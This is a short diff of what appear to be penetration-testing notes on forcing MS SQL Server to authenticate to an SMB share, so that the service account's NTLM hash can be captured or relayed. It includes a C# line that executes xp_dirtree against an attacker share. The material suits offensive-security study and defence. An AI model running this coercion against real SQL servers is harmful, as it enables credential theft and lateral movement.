MS SQL

 NTLM authentication will take place if we force an SQL server to connect to an SMB share and we should be able to capture the hash of the user account under whose context the SQL server is running.

-Many other SQL procedures can be used to initiate the connection if xp_dirtree has been removed for security reasons
+Many other SQL procedures can be used to initiate the connection if *xp\_dirtree* has been removed for security reasons

-// Force NTLM authentication for hash-grabbing or relaying
+<pre class="language-csharp" data-title="insert into Main" data-overflow="wrap" data-line-numbers data-full-width="true"><code class="lang-csharp"> // Force NTLM authentication for hash-grabbing or relaying

 String res = executeQuery($"EXEC master..xp_dirtree \"{targetShare}\";", con);